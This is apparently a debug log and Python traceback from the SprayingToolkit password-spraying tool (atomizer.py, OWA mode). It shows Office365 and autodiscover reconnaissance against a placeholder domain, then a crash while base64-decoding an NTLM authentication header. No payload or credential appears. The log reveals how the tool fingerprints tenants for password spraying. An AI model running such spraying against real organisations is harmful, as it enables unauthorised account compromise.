MainThread urllib3.connectionpool: Starting new HTTPS connection (1): login.microsoftonline.com:443
MainThread urllib3.connectionpool: https://login.microsoftonline.com:443 "GET /domain.com/.well-known/openid-configuration HTTP/1.1" 200 1575
MainThread         owasprayer: [*] OWA domain appears to be hosted on Office365
MainThread urllib3.connectionpool: Starting new HTTP connection (1): autodiscover.domain.com:80
MainThread urllib3.connectionpool: http://autodiscover.domain.com:80 "POST /autodiscover/autodiscover.xml HTTP/1.1" 302 0
MainThread urllib3.connectionpool: Starting new HTTPS connection (1): autodiscover-s.outlook.com:443
MainThread urllib3.connectionpool: https://autodiscover-s.outlook.com:443 "GET /autodiscover/autodiscover.xml HTTP/1.1" 401 0
Traceback (most recent call last):
  File "/root/scripts/SprayingToolkit/core/utils/ntlmdecoder.py", line 219, in ntlmdecode
    st = base64.b64decode(st_raw)
  File "/usr/lib/python3.6/base64.py", line 87, in b64decode
    return binascii.a2b_base64(s)
binascii.Error: Incorrect padding

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "atomizer.py", line 101, in <module>
    atomizer.owa()
  File "atomizer.py", line 64, in owa
    password=self.password,
  File "/root/scripts/SprayingToolkit/core/sprayers/owa.py", line 19, in __init__
    self.recon()
  File "/root/scripts/SprayingToolkit/core/sprayers/owa.py", line 36, in recon
    self.netbios_domain = self.get_owa_domain(self.autodiscover_url)
  File "/root/scripts/SprayingToolkit/core/sprayers/owa.py", line 56, in get_owa_domain
    ntlm_info = ntlmdecode(r.headers["WWW-Authenticate"])
  File "/root/scripts/SprayingToolkit/core/utils/ntlmdecoder.py", line 221, in ntlmdecode
    raise Exception(f"Input is not a valid base64-encoded string: {e}")
Exception: Input is not a valid base64-encoded string: Incorrect padding
